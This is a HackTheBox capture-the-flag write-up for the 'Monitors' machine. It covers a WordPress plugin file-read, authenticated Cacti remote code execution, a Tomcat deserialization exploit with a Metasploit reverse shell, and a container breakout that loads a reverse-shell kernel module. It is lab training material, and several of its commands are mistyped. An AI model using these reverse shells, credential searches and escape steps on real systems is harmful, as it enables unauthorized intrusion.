Monitors (HackTheBox) — Write-up

Tanishq Sachin Shah
4 min readOct 11, 2021


In this blog we will see walk-through of HackTheBox machine — Monitors

Like all machines, we begin by enumerating open ports with nmap scan -

nmap -sC -Sv

Seeing as port 80 is hosting a web-server lets check -

Since direct access is blocked add monitors.htb to your /etc/hosts file and now lets check again

Now here we get to know that this is an WordPress website so let’s try wpscan and find if there is any vulnerable plugin -

wpscan -url http://www.monitors.htb

Here we find a plugin wp-with-spritz while enumerating I found an exploit-db this plugin is vulnerable so now let’s check it using burp-suit

It worked now lets check the Word-press database file wp-config.php

Here we got the db_password now lets find where to use it by fuzzing here we can see a file

Now let’s add cacti-admin.monitors.htb to our /etc/hosts file and check

Here we can use that username and password we find earlier and can successfully get logged in

The version of this service is 1.2.12 that has an authenticated remote code execution exploit —

Now run -

nc nlvp 4444

python3 -t http://cacti-admin.monitors.htb -u admin -p (password) -lhost (your ip addr) -lport 4444

Now you will get a shell first make it interactive using

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Here still we have not got the user flag I found some files but was unable to read it so I tried using

grep ‘marcus’ /etc -R 2>/dev/null

I looked at the content present in the file -

Here got password for the user marcus let’s

ssh marcus@monitors.htb.

Here I found docker was running so I used netstat -tulnp and found port 8443 running

Now to see what’s running on it let’s forward the port

ssh -L 8443: marcus@

Now visit —

Here this Version : 9.0.31 have an exploit related to deserialization

Now run msfconsole

And write options to setup the exploit
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set FORCEEXPLOIT truerun

Now finally we got a shell first make it interactive by running this command

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Now, we are into the docker container. After this, we have to breakout from the container to the host

cpash -print

Here we see cap_sys_module this will help us to get root

Copy the source code and Makefile on local machine and the ip and port so that we could listen on host now wget this files on the target machine

Now run -

make clean


After this succeeds first listen on local machine using

nc -nlvp 4445

Lastly, execute the exploit on the docker container — insmod reverse-shell.ko



Tanishq Sachin Shah
Tanishq Sachin Shah

Written by Tanishq Sachin Shah

Triage Analyst @HackerOne | Blogger | Penetration Tester | Red Team | Skating Coach

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